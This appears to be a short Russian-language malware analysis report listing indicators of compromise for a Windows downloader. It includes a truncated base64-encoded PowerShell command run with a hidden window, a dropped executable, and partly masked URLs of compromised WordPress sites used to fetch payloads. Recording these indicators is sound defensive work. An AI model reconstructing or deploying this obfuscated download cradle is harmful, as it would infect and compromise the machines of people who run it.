Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABZAFQAVgBVAFgAbQBoAGQAPQAnAEcASQBEAEcASQB0AHYAcgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBgAEMAdQByAGAASQBUAFkAUABSAE8AdABPAGAAYwBvAEwAIgAgAD...
- %HOMEPATH%\502.exe
- %HOMEPATH%\502.exe
- http://www.tr####ancers.com/wp-includes/certificates/qzafEEIk/
- http://vm##i.ga/wp-includes/2wz1ptfqjd268175627/
- http://ka###u.com.br/wp-content/f9jp11mf09787216/
- http://www.ka###u.com.br/wp-content/f9jp11mf09787216/
- http://ip###mer.com.br/wp-admin/zirl02193/
- http://fo#####3.mycpanel.rs/CONFIG/mKGspN/
- DNS ASK tr####ancers.com
- DNS ASK vm##i.ga
- DNS ASK ka###u.com.br
- DNS ASK ip###mer.com.br
- DNS ASK fo#####3.mycpanel.rs
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABZAFQAVgBVAFgAbQBoAGQAPQAnAEcASQBEAEcASQB0AHYAcgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBgAEMAdQByAGAASQBUAFkAUABSAE8AdABPAGAAYwBvAEwAIgAgAD...' (со скрытым окном)